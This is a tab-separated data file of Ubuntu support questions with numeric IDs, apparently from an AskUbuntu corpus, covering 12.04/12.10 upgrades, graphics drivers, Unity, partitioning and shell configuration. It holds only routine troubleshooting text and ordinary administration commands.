204549	ressource difference between server and desktop	how much difference , ressourcewise , is there between the two versions ? also what 's version would you reccomend ? 12.04 or 12.10 ?
204555	how to make ubuntu look like windows vista ?	well for starters , i do know that this sounds weird to want it to look like vista and not windows 7 , but i just do n't like how win7 looks , that 's just me , you can not change me . i have searched on google quite a bit looking for this , nothing shows me to make 12.04 look like vista , just win7 . so if you could help me , thanks !
204557	what security exist when sharing files via an external usb drive ?	we have several external sources that send us data via an external hard drive . what security risks are we exposing ourselves to ?
204572	upgrade ubuntu 12.04 to 12.10 failed	i 've a problem . upgrade failed after `` setting new software channels '' , when calculating changes . i tried error : not all updates can be installed an unresolvable problem occurred while calculating the upgrade : e : unable to correct problems , you have held broken packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . now i have 1580 packages to update and do not update . partial system upgrade also fails in the first step . what next ? alternatively , to undo the changes ? thank 's to help .
204574	applications linked to workspaces	i have just upgraded to ubuntu 12.04 and i found a weird behaviour in the multi-workspace management . let 's say that i have a couple of terminals opened in one workspace , and that i want to do something else in another workspace . i move to that workspace and then i click on the terminal icon . immediately i am taken to the initial workspace . this is similar to the multiple workspace behaviour in os x and it is entirely undesirable . how can i disable the application-workspace association in 12.04 ? thanks
204576	12.04 login gone wrong	i seem to have a fault in the login procedure somewhere . when i boooted up i found that if i selected guest i could use the computer . if i selected my administrator account i was taken straight to the terminal . so i opened a guest session , went to user settings , and unlocked my admin account ( it accepted the password ! ) , and amended it to show `` password none '' and automatic login . i now find that when i boot up i am taken straight to the terminal - if i exit terminal i get the login screen - if i select the administrator login i go back to terminal - if i select guest i can use the pc , and if i select mu normal user account i can use the pc . so i can not login as an administrator - so admin functions such as update are no longer accessible . sorry to be so long winde but i am stuck . can anyone suggest anything - i am a beginner with this
204577	nvidia gtx250 ( ubuntu 12.10 64 ) after install drivers video change to 1600x1200 ( without left panel , without borders ( file , help , go ) )	nvidia gtx250 ( ubuntu 12.10 64 ) after install drivers - 304.51.really.304.43-0ubuntu1 ( there was x3 point of 96 , 173 , current- video change to 1600x1200 ( without left panel , without borders ( file , help , go ) ) . i opened ( by right mouse lick ) and changed to 1024x768 = lines and nothing else ( but ubuntu works ! so how repair it back to normal ? thank 's for all how will tell me how to ! ( sorry about my english ) .
204578	how can i enable the old african savanna sound on boot ?	hi i would like very much to enable the sound when i start ubuntu with the old african savanna sound that ubuntu had in older versions . can somebody help me please ?
204589	no features in bash in new vps ?	i have 12.04 server minimal running on my vps . when i ssh into the server , only $ is showing at the prompt for each prompt . there 's no typical < directory > < username > $ , no autocompletion ( bash-completion is installed ) , and no use of arrow key , etc . i 'm suspecting bash or .bashrc is not sourced or something ? how do i get the standard bash features working ? edit : bash , .bashrc , and .profile exist in the filesystem . here is my ps output : $ ps pid tty time cmd 4053 pts/0 00:00:00 sh 4055 pts/0 00:00:00 ps
204590	package linux-headers-3.7.0-999 is not installed	when trying to install the three amd64 debs for the 3.7.0 kernel from : http : //kernel.ubuntu.com/~kernel-ppa/mainline/daily/2012-10-22-quantal/ i get this error : dpkg : dependency problems prevent configuration of linux-headers-3.7.0-999-generic : linux-headers-3.7.0-999-generic depends on linux-headers-3.7.0-999 ; however : package linux-headers-3.7.0-999 is not installed . it installs and works correctly but leaves me with broken packages in synaptic . is this just a bug with how ubuntu is packaging these latest debs ? or am i doing something wrong ?
204591	what part of the update manager do you have sift through for , to avoid errors in one 's system ?	are the updates on the update manager all by ubuntu ? what part of the update manager do you have sift through for , to avoid errors in one 's system ? thanks .
204601	nvidia proprietary drivers not working in ubuntu 12.10	i tried all proprietary drivers for my nvidia gts450 graphics card , and after rebooting my pc , i get a very low resolution , and no desktop environment . i 've tried the experimental 304 version and both other available versions as well . i am wondering if it has to do something with my pc , or the drivers have n't been optimized to support 12.10 yet ?
204602	apt-get install not working	sudo apt-get install < anything > is not working in my terminal whenever i try doing it , it displays the following error message : - err http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main vim-runtime all 2:7.3.429-2ubuntu2.1 could not connect to 111.125.139.199:8105 ( 111.125.139.199 ) . - connect ( 111 : connection refused ) err http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main vim amd64 2:7.3.429-2ubuntu2.1 unable to connect to 111.125.139.199:8105 : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_7.3.429-2ubuntu2.1_all.deb could not connect to 111.125.139.199:8105 ( 111.125.139.199 ) . - connect ( 111 : connection refused ) failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.3.429-2ubuntu2.1_amd64.deb unable to connect to 111.125.139.199:8105 : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
204604	can i upgrade ubuntu by installing latest version over the older ?	i have ubuntu 11.04 on my laptop , and i want to upgrade it to ubuntu 12.04 . i have tried to upgrade from upgrade manager but based on my home internet speed , it estimated around 48 hrs so i quit it . more over i have ubuntu 12.04 installable , so i wanted to ask what will happen to my 11.04 if i install 12.04 over it , will my data of 11.04 will be lost ? how will i achieve the upgrade ?
204607	ubuntu 12.10 upgrade and web app do not work	i started firefox , saw the pop-up window and clicked install for gmail and google calendar . i get no change in my unity left launcher menu , nor when i tried to type gmail in the dash . however when i tried to uninstall the amazon webapp in the ubuntu software package , it says that i first need to uninstall gmail and google calendar . i do n't really see why but at least it means that they are somewhere . when i do sudo apt-cache search gmail i get unity-mail - mail notifications and count for unity unity-webapps-gmail - unity webapp for gmail
204618	problem with realtek 8723	after installing 12.10 , i tried to install the drivers for my wireless chipset , realtek 8723 . after i downloaded and extracted the files , i tried to compile , but i received an error message : daniel @ ubuntu : ~/descargas/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 $ make make -c /lib/modules/3.5.0-17-generic/build m=/home/daniel/descargas/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : se ingresa al directorio «/usr/src/linux-headers-3.5.0-17-generic» cc [ m ] /home/daniel/descargas/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o /home/daniel/descargas/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : en la función ‘_rtl_init_mac80211’ : /home/daniel/descargas/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : error : ‘ieee80211_hw_beacon_filter’ no se declaró aquí ( primer uso en esta función ) /home/daniel/descargas/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : nota : cada identificador sin declarar se reporta sólo una vez para cada función en el que aparece make [ 2 ] : *** [ /home/daniel/descargas/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/daniel/descargas/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : se sale del directorio «/usr/src/linux-headers-3.5.0-17-generic» make : *** [ all ] error 2
204620	ambiance theme gone ! i 've left with radiance , when i try to select it i got a metacity like theme	ambiance theme gone ! i 've left with radiance , when i try to select it i got a metacity like theme . ( tried to reinstall ambiance themes etc without any luck . i 'm using ubuntu 12.10 64bit .
204623	online accounts blank after upgrade	after upgrading from 12.04 to 12.10 i got all entries of online accounts blank . see the screenshot : i tried to uninstall gnome-control-center-signon and install it back , but no luck . is there any way to fix it or at least clear all the entries so i can add them again ? by the way , i can not add new entries as well , because the option list for account type is also empty . please help . thanks .
204625	changing margins and alignment in the lyx gui	i 'm new to lyx . it seems to be really appropriate for the work i 'm doing but i have these questions pertaining to the graphical user interface . of course i 'm aware that the output is radically different from what is shown in the gui - my questions have to do with the comfort of the interface as i write : is there a way to make the margins wider in the gui ? i find that screen-wide text blocks are n't easy on the eye . of course i can resize the window but that gives my a pretty messy work environment with my desktop or other programs in the background - also this would n't work when i 'm in full-screen mode . is there a way to have left text alignment ( instead of straight margins ) in the lyx gui ? i do n't like the spacing to be stretched when i 'm in the process of editing text .
204628	blank screen after plymouth	i have a 2.53 ghz intel celeron cpu , 512 mb ram , and a geforce 5200fx gpu . i 'm experiencing a a problem while booting : during boot after plymouth ( boot animation ) the monitor goes blank and ctrl+alt+f1 is not working ! in wubi installer option ( on boot ) i have to press the esc key and select `` start ubuntu whith safe graphical '' or etc . that worked . however i want to install lubuntu 12.04 on my pc using livecd ( not wubi ) , and not have the `` safe graphical mode '' , and `` no acpi '' , `` nomodest '' , `` vga=safe '' options enabled all the time !
204630	can not install php5-fpm , error : no installation candidate	i am unable to install php5-fpm from sudo apt-get install php5-fpm . it says : no installation candidate . no .deb repository link available . does anyone have a solution ?
204631	i have an asus g74sx.. want to dual boot ubuntu with windows 7 . 32 bit or 64 bit ubuntu ?	i 'm not sure as to what architecture of ubuntu go for ... either 32 bit or 64 bit . i 'm not sure if to go with the 64 bit since i have 12gb of ram , so that with 64bit it will cover the 12gb . also i would like to know what are the disadvantages of each of them , either 32 or 64 . thanks in advance ! : )
204633	how do i stop unity dash truncating file names ?	when i 'm looking for articles with long names in unity dash , i would like to have the full filename displayed instead of the current truncated view . it 's difficult to find a specific article by searching on filters as it sometimes returns 10 or more results making it impossible , especially if you have a regular file naming convention e.g . yyyy- [ author name ] -title displaying full document names similar to compact view of nautilus would be helpful . is there a way to do this ?
204638	gerrit push not working	i tried executing the command git push gerrit head : refs/for/br_ps_1109 it gave the response : fatal : remote part of refspec is not a valid name in head : git remote version is also fine , as evident below : - vverma @ l-vverma : ~/git_repo/nextag $ git remote -v gerrit ssh : //vverma @ gerrit.corp.nextag.com:29418/apps/nextag ( fetch ) gerrit ssh : //vverma @ gerrit.corp.nextag.com:29418/apps/nextag ( push ) origin git @ ind-git.corp.nextag.com : apps/nextag ( fetch ) origin git @ ind-git.corp.nextag.com : apps/nextag ( push )
204640	how to stream a local video file over internet using avconv/avserver ?	as ffmpeg is going to be dropped from ubuntu , it will be important to know how to broadcast videos over intrnet using avconv . an official guide is available , but it does n't give much information how to work it out , step by step ... i have tried several times , but no luck . your simple & complete instructions are highly appreciated ... . ! thanks !
204642	black screen after upgrading to 12.10	a few days ago , i upgraded to 12.10 . no problems during installation other than two or three errors saying that it was trying to upgrade to something that was already install . so it finished , and asks me to reboot . i reboot , pass grub with no problems , loads up the purple screen from grub , and then hangs on a black screen . i have tried going into recovery mode , with no luck . i have tried going to lower kernel versions with no luck . i did upgrade the kernel to 3.3.6 to stop the constant freezing freezing with intel hd 4000 . also , i did try pressing `` e '' on the grub menu , changing `` quiet splash '' to `` nomodeset '' and that does n't work . i have a livecd with 12.10 handy , and waiting .
204643	how to get missing dependency for make empathy : glib-compile-schemas ?	i downloaded empathy-3.0.1.tar.bz2 to install in ubuntu 10.04 lts . i ran the makefile and i got the error : configure : error : glib-compile-schemas not found . how can i fix this problem ? please help me .
204645	ubuntu switched back to ubuntu-2d in 12.04	this problem may have been reported earlier but i was unable to find a solution to this . after trying to install nvidia drivers my ubuntu session changed to ubuntu-2d and i am unable to restore it to ubuntu 3d . which drivers i may need to install/remove to solve this problem ? for further reference , heres a pic of how my workspace switcher looks like when changing workspaces . i would like it to be as it was when ubuntu was first installed .
204646	my toshiba l655 s5144 battery is not detected on ubuntu 12.10	i used toshiba l655 s5144 and when i installed ubuntu 12.10 gnome `` no battery '' present
204648	how to convert `rm` and `ra` audio files to mp3 in ( l ) ubuntu ?	i have radio programs that i have obtained with the extension rm and ra . how to convert them to mp3 or other more common type ?
204649	how can i use avconv to convert multiple files in the terminal ?	i 'm new to linux and i want to execute one command on every file in a loop : avconv -i *.mp4 -vcodec copy -ac 2 -strict experimental *.mp4 can any one tell me how i can do this ? i have more than 100 files to convert . i just want to convert them into new files with the same names , but using different codecs . it works for one file but i do n't know how to run it on all of the files . i found this avconv documentation but i ca n't find the answer in there either .
204653	i have formatted a partition for ubuntu . how do i install it on that partition ?	i have a formatted 55gb partition as ntfs , the other part of the hard disk has windows 7 . is ntfs the right format for ubuntu ? if not how should i format it and with what format ? once i finish preparing the partition , how do i install ubuntu on that partition ? i 'm not sure how to set up dual-boot ubuntu and windows .
204656	how do i make unity quit opening firefox under the shiretoko icon ?	i 'm using ubuntu 12.04 , and whenever i open firefox , whether it is from searching on the dash or clicking a 'quick-launch ' launcher , it always opens yet another icon for the running instance that is a blank page and says shiretoko . it will pulse the firefox icon for a while ( i 'm guessing until a timeout or something ) . it 's as if unity no longer recognizes the firefox process as firefox and misidentifies it as shiretoko . ( i know shiretoko was a testing version of firefox a long time ago . ) how do i set unity straight ? i imagine that it has something to do with me once using shiretoko , but i believe that was even on a different installation , just the same home folder . is there some place unity caches this information that i can clear ( or remove specific parts of ) ?
204660	recent apps , files and downloads will not change in unity 12.04 dash	at the beginning of my fresh installation it worked great , but now it does n't change at all . how do i `` re-enable '' it or `` fix '' it ? thanks .
204667	making gnome-screensaver auto-lock in xfce	gnome-screensaver has been vastly simplified for major version 3 and no longer supplies the preferences dialog . it is now only useful for locking the screen and providing an unlock dialog . i use 12.04 lts at the moment and am able to install gnome-screensaver version 3.4.1-0ubuntu1 and add it to the xfce session 's application autostart list . gnome-screensaver then works when i select lock screen from the panel . i am , however , unable to configure gnome-screensaver to auto-lock the screen . there is no obvious configuration file or dialog where i can set the timeout . right now i use xscreensaver to achieve auto-locking but i do n't really care about screensavers , i prefer auto-lock and display suspend via dpms . right now xscreensaver does n't really play well with lightdm on my system - user switching requires the password to be entered twice : user a lock-screen : press new login lightdm : enter user b password user b xscreensaver lock-screen : enter password again i should mention that this system was installed as ubuntu years ago and i 've been installing various xubuntu-desktop meta-packages to try out various desktop environments . can anyone help me set up gnome-screensaver auto-lock ?
204670	why are n't my bash aliases applied when logging in to server	when i log in to my ubuntu 12.04 lts server my bash aliases are n't applied , but if i execute bash from the command line they are . ~/.profile executes ~/.bashrc : if [ `` $ bash '' ] ; then if [ -f ~/.bashrc ] ; then . ~/.bashrc fi fi , which in turn executes ~/.bash_aliases : if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi and ps -p $ $ shows 31662 pts/0 00:00:00 bash do i have something misconfigured ?
204673	how do i get back into ubuntu ?	i just deleted root.disk in windows 7 because it seemed at the time like the only way i could rename the new partition i had created ( with wubi resize disk ) to replace it as `` root.disk '' because when i tried to rename it oldroot.disk it gave me an error saying i could n't do that . how do i get back into ubuntu ? this new root.disk i created using this wubi resize disk following all the steps i was hoping to rename the old partition , `` oldroot.disk '' but since i could n't i deleted it and now i ca n't get back into ubuntu even though i did in the end after running chkdsk manage to rename my new partition ( which had all the files of the old and now deleted root.disk ) `` root.disk '' .
204677	how to install ubuntu 12.10 on the gpt ?	i have installed win7 first and i created gpt . unfortunately , when i try to install ubuntu 12.10 , in the gparted , it just show all my hdd have n't partition . in the window i still see the c , d , e ... . why was that happend ? can i fix it or i must format ? i really want to use ubuntu .
204680	gnome-terminal + vim and ctrl-shift mappings	is it possible to map sequence with ctrl-shift in gnome-terminal ? i 'm trying to add mappings : map < c-s- [ > gt map < c-s- ] > gt and it 's not working . how to do that ? somehow i mapped < c-s- ] > , but it turned out it 's not < c-s- ] > , but < c- ] > , so it looks like it does n't recognize shift in this sequence . it 's misconfigured or it 's gnome-terminal 's fault ? besides . mapping < c- [ > , after pressed , looks like vim is waiting . i suppose it 's mapping timeout , but how to get rid of this timeout when i press precisely < c- [ > and i do n't want to press anything else ? i just started learning vim , so sorry if there is something obviously wrong in that mappings .
204681	kompozer not in the repo ?	why is kompozer no longer in the repositories ? can any one suggest a new alternative ( other than bluefish ) ?
204686	ubuntu installation on windows7 with d partition	i have the following problem : i want to install ubuntu , having already installed windows 7 and the hd already partitioned . i do not want to erase my data . during the installation procedure i see the following partitions on my hd : sda1 - 100 mb sda2 - 190 gb ( this is my windows c : ) sda5 - 285 gb ( this is my d : windows partition with my data ) sda4 - 25mb i guess i should resize the space of sda5 in order to leave nough space for ubuntu and swap memory on sda4 . however , will this delete all my files on d : ? i have also no understanding of the 'mounting directory ' option ( /windows or /home ) : what is it for ?
204689	pdf to doc with formating	hi i want to convert pdf to doc keeping the formation i found http : //embraceubuntu.com/2007/04/10/convertimport-from-pdf-and-keep-the-formatting/ this solution but when i installed kword i got caligra words . import do n't support .pdf files , should i install extra plugin for this extension , or install older version of kword .
204691	ca n't reboot system using ssh	i am running ubuntu server 12.04 and i would like to reboot my system . i ssh into it fine , but when i run sudo reboot i get the following error -bash : /usr/bin/sudo : input/output error . it is at this point that i noticed other commands are disabled and i am no longer able to write or save any files to the disk . short of manually rebooting the system , is there a way to fix this ? i am not sure i understand exactly what is going on .
204694	how to install ia32-lib on 64 bit system ?	i am new on ubuntu and setting android environment.i googled too much for this problem but nothing is helping ! ! when i open eclipse and test android sample project i get a error saying `` r can not be resolved '' error executing aapt . please check aapt is present at /home/rahul/android-sdks/platform-tools/aapt hint : on 64-bit systems , make sure the 32-bit libraries are installed : sudo apt-get install ia32-libs on trying sudo apt-get install ia32-libs e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
204704	where do i look for the reason for the removal of a package from the ubuntu repositories	i have seen that when a new ubuntu version is released , sometimes a particular application that i had used till the previous ubuntu versions would have been removed from the ubuntu repositories for the latest release . who can makes such decisions ( a particular launchpad team/individual , etc.. ) , and which mailing-list ( or other resource ) should i look to find the exact reason for removal of the package from the latest ubuntu release . e.g : kompozer has been removed from the repository for quantal
204706	is the ubuntu application review board dead ?	personally , i have n't had a response from either the mailing list or replies on myapps for well over three months . and with the last update on the arb trello board being from september 16th , i have to wonder if there is any progress being made for anyone ?
204708	mounting ntfs partition that all users can read but only root can write too ?	i have an ntfs partition i use to share data between ubuntu and windows on /dev/sda5 . i am wondering if there is a way to make it readable by user ( on a single user computer ) but only write-able by root . basically all i want is to be able to listen to the music files in my player , for example , but have them be unable to be altered or deleted without sudo-ing . is this possible through fstab ? my current fstab entry : /dev/sda5 /media/disk ntfs defaults , uid=1000 , gid=1000 , noatime 0 0 i imagine it is some sort of umask command or change in uid or gid , but i ca n't figure it out so far .
204709	ubuntu 12.04 with gnome classic trayicon does n't work ( at least for pidgin )	i 'm using ubuntu 12.04 with gnome classic . pidgin 's tray icon does n't show up . the settings is ok ( `` always '' ) . for any case , i 've also added it in dconf-editor as per how to enable notification area ( systray ) for pidgin although that 's probably only for unity . also i 've reinstalled and restarted pidgin . but still no success - no trayicon anywhere . i wanted to check whether i have the taskbar in the ui , but i have no idea how to set up panels in gnome classic . right-click on panel does n't work . any ideas ?
204712	i7 turbo mode not recognized in virtualbox	recently i made the switch to ubuntu 12.10 as my main os for my laptop . for the longest time , i 've been running windows 7 with ubuntu 12.04 inside virtualbox . as i found myself more and more inside the virtualbox , i decided to switch roles . the problem i 'm seeing is that running windows 7 inside virtualbox on top of a linux host seems to be slower than when the roles were reversed . one thing in particular i noticed was on the windows 7 guest vm , the cpu frequency reflected the default frequency ( 2ghz ) . to contrast this , i created a windows 7 vm on top of a windows 7 host and it shows the turbo mode frequency and is much snappier than my vm being hosted on ubuntu . is there anything special i need to do to enable the turbo mode ? are there any other steps i can do to make the virtual machine run better ? the vm i created has 4 cores , 8 gb ram and 256gb video memory dedicated to it . since i 'm a .net developer , i need some horsepower when i 'm running windows ... if it 's of any help , here are the specs of the machine i 'm trying to get this to work on : processor : i7-2630qm ram : 16gb video : nvidia gtx 460m storage : 128 gb crucial m4 ssd , 750gb hdd
204716	bluetooth - how to browse files on a device ?	it might sound stupid , but i do n't know how to browse files on my device ( phone ) connected to ubuntu machine via bluetooth . i see that the connection is established , i can send files from my computer to the phone , but just ca n't seem to find how to browse the phone 's file system . i should mention that my bluetooth adapter is foxconn / hon hai , which has n't been supported in linux until recently . however , now i 'm able to pair my phone with the computer , and to send files from my computer to the phone . what 's not working is sending files from the phone to the computer and browsing phone files on the computer . the reason why i 'm asking this question is actually to check whether my bluetooth adapter is still not fully supported , or i just do n't know how to use it properly .
204721	problem with ubuntu 12.10 minimize animation	i have a small problem with the new ubuntu 12.10 minimize animation . i currently have a laptop and a desktop , both upgraded from 12.04 to 12.10 . the problem shows up only on the desktop . when i minimize a window , instead of viewing the whole window fade and zoom out , the content disappear , and only the bezel complete the animation . here is a short screencast that shows the behavior : http : //youtu.be/9fwlimfs85a any ideas on where i can look for a solution ? many thanks in advance . regards . update looks like the open source driver works perfectly . the problem is that the performance is not so cool , and some games that push a little the graphic ( like torchligt ) do not even startup . linus is right about nvidia ...
204733	12.10 repository in 12.04 , is it possible ?	can i add ubuntu 12.10 repositories to 12.04 to have the latest software and updates ? if , yes , how can i do this ? i know that by adding ppas i can have latest software , but really , i do not like to use ppas . so is there any way to use 12.10 repositories in 12.04 ?
204737	ubuntu 12.04 touchscreen calibration	i have a machine with ubuntu 12.04 installed , with dual monitor , via vga and dvi interface . the monitor is one touch screen and the other one is regular lcd monitor . the touch screen is made in china with some unknown brand , and i am using egalax driver . the touch screen is now detected and works , but i need to do some calibration since it does not correctly perform click on touch . the problem is , when iâm using xinput_calibrator , it shows 4 crosses to be clicked on , because iâm using dual monitor , the crosses is now show 2 on the touch screen ( touchable ) and the others on the other monitor which is regular non-touch monitor . please help , thank you . ====tried this , no luck========= i tried to unplug the second monitor and then redo the calibration with xinput_calibration , and then saved it . restart , all accuracy is fine , and the touch screen is working perfectly . but when then the 2nd monitor ( samsung lcd tv , via hdmi ) is replugged , the touchscreen calibration was simply like gone , the accuracy is now lost . touch on a point , the system click on another . my screens was configured at 1024x768 on both monitor . with touchscreen on the left . system ( ubuntu 12.04 x64 ) sees it as big 2048x768 resolution .
204740	is it possible to enable unity web apps desktop integration with firefox web apps downloaded from the mozilla marketplace ?	the mozilla marketplace has opened a few days ago for early adopters , developers , and testers . with a few tricks , it 's entirely possible to install firefox web apps ( which are really handy ) on ubuntu . however , using the twitter web app for instance , does n't enable the twitter desktop integration that the user benefits from while visiting twitter.com in a firefox tab . is there a workaround to enable the web apps to be integrated into the desktop as well ?
204741	gnome tweak tool problems	i am now using ubuntu 12.10 and i tried to install gnome shel extension and gnome tweak tool . however , here is my problem : you can see that my tweak tool does not receive user themes.. when i checked the ubuntu software center , i see that gnome shell extension preferences and gnome shel user themes has already installed . so , what is my problem , and how can i fix it ? please help me . thanks .
204744	12.10 blue screen , desktop bars do not load	just upgraded to ubuntu 12.10 . i ca n't reach the desktop , it is stuck on the blue screen , the desktop environnement does not load . only gnome with no effects works . can you help please ? config : thinkpad t400 , 6 gb of ram , graphic card : intel gma 4500mhd lspci | grep vga 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) i am not sure i have not messed up lightdm / gdm previously ... edit : i just tried a 12.10 live usb version and it works fine ... .so it is a problem in my install for sure .
204749	booting from usb problem	i 'm trying to boot ubuntu 10.12 from a usb memory stick in a first time installation , but i keep getting a message preventing me from progressing any further . it says this . syslinux 4.06 edd 4.06-pre1 copyright ( c ) 1994-2012 h.peter i 've reordered my bios boot priorities correctly so the usb loads before the hard drive . my hard drive is faulty , but i am getting a new one tomorrow . any ideas ? help would be much appreciated .
204750	upgrade ubuntu 12.04 to ubuntu 12.10 ( lower graphics mode )	i just upgraded my 12.04 based dell inspiron laptop to 12.10 but after the reboot i got a message saying system is running in lower graphics mode . but i 'm still not able to access unity and gnome . this is with an amd radeon hd 7570m graphics card . how do i fix this issue ?
204753	ripping mp3s in rhythmbox ubuntu 12.10 ( 64 bit ) ?	i installed a couple of days ago ubuntu 12.10 ( 64 bit ) . i today tried ripping a cd in the mp3 format . however , whenever i try to rip , it says it is missing an extra multimedia plugin `` gstreamer extra plug-ins ( i386 ) '' . i then try to install the : i386 version of the gstreamer-ugly plugins , but then i get the same problem but with the id3-demuxer ( or something similar ) the terminal output i get from both problems ( but replace the `` mpeg-1 layer 3 ( mp3 ) encoder '' with the `` id3-demuxer '' name ) is : james @ clefairy : ~ $ rhythmbox ( rhythmbox:24122 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed rhythmbox-message : missing plugin : gstreamer|0.10|rhythmbox|mpeg-1 layer 3 ( mp3 ) encoder|encoder-audio/mpeg , mpegversion= ( int ) 1 , layer= ( int ) 3 /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject it does n't help that each time i have to install/remove the entire gstreamer-ugly collection each time - i ca n't find that specific file . the cd plays fine , it 's the ripping plugin that does n't seem to work . i did n't have this problem previously on 12.04 ( 64 bit ) .
204754	unity does n't work on nvidia ion	i just installed ubuntu 12.10 on my asus 1201n and unity refuses to work after installing the nvidia binary drivers . it works fine on the default , but those are no where good enough when it comes to playing games . this is the output of unity_support_test : xlib : extension `` glx '' missing on display `` :0 '' . error : glx is not available on the system i ca n't find any ways to fix this . the setup is as pure as possible with absolutely no additional software , so it ca n't be something i installed . edit : oh , and with the open nouveau driver , everything works fine . i 'd like to run the nvidia driver though .
204759	how do i delete a second 12.04 os from my computer ?	the whole world will know now that i am not the brightest bulb - os wise anyway . i was having problems with ubuntu 12.04 so thought i would re-install it . after it began , i realized i really did not want this and could n't stop it . it installed a 2nd os with the same name in another partition . how do i delete that new os ?
204764	best audio drivers for xps 15 and ubuntu12.04	the sound quality on my xps 15 speakers appears to be a little degraded . it would be very helpful if some one suggests a good audio driver package for ubuntu 12.04 64-bit . i have 2.1 channel speakers .
204769	libreoffice menu bar does n't function	i 've recently installed ubuntu 12.10 and libreoffice in this os does n't work correctly . any time i click something from the menu bar ( e.g . file - > print or save as ) , nothing happens . it looks like a window is appearing after my click , but is hidden somewhere . please help me fix it . thanks in advance .
204771	ubuntu 12.10 installation hangs at 'preparing to install ubuntu '	i have downloaded the ubuntu 12.10 i386 desktop iso both via http & torrent download . i have attempted the install via cd & bootable usb ( created using yumi from pendrive linux ) , each using a different iso ( to rule out corruption ) . i can boot from cd & usb and use the live ubuntu , but each time i try to install it , ubiquity hangs at the `` preparing to install ubuntu '' screen . it does n't matter if i check or uncheck the 'download updates while installing ' and/or 'install this third party software ' options . i am attempting install on a dell inspiron 6000 notebook ( pentium m 1.60ghz , 2.0gb ram , 160gb hdd ) with an existing windows partition . the install from cd worked without incident on my triple boot macbook pro . also , the system log app will not open , unsure if this is related .
204776	how can i change the two figure behavior with my macbook pro ( 6,2 ) 's trackpad ?	by default on mac os , with two fingers i can do this : -leave a finger on the mouse pad , and move another finger , and still be able to move the mouse -two finger scrolling requires both fingers be moving this is handy , as sometimes ( because the trackpad is so large , i leave my thumb on the `` button '' ( or any other fingers depending on how i 'm sitting ) for clicking , as clicking and moving the cursor at the same time is difficult with this track pad ( the whole thing needs to be pressed to click ) i think this probably also affects click and drag , as i would only be allowed to use one finger , instead of one finger to click , and the other to move the cursor .
204778	unity completely broken after upgrade to 12.10 ?	i am facing a very frustrating issue with my computer right now . i successfully upgraded to ubuntu 12.10 this afternoon , but after the upgrade , the graphical user interface seems completely broken . to be more specific , i can not get the unity bar to appear on the right . i have tried many things , including ( but not limited to ) purging and then reinstalling the fglrx drivers , apt-get install -- reinstall ubuntu-desktop , apt-get install -- reinstall unity , tried to remove the xorg and compiz configurations , checked to see if the ubuntu unity wall was enabled ( it was ) in ccsm , all to no avail . could someone help me troubleshoot and essentially fix this issue ? note : this is the output when i try to enable unity via a terminal : compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : reset compiz ( core ) - error : failed to load plugin : reset compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 153 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 22 current serial number in output stream : 22 compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . compiz ( core ) - info : starting plugin : opengl compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - error : plugin initscreen failed : opengl compiz ( core ) - error : failed to start plugin : opengl compiz ( core ) - info : unloading plugin : opengl compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 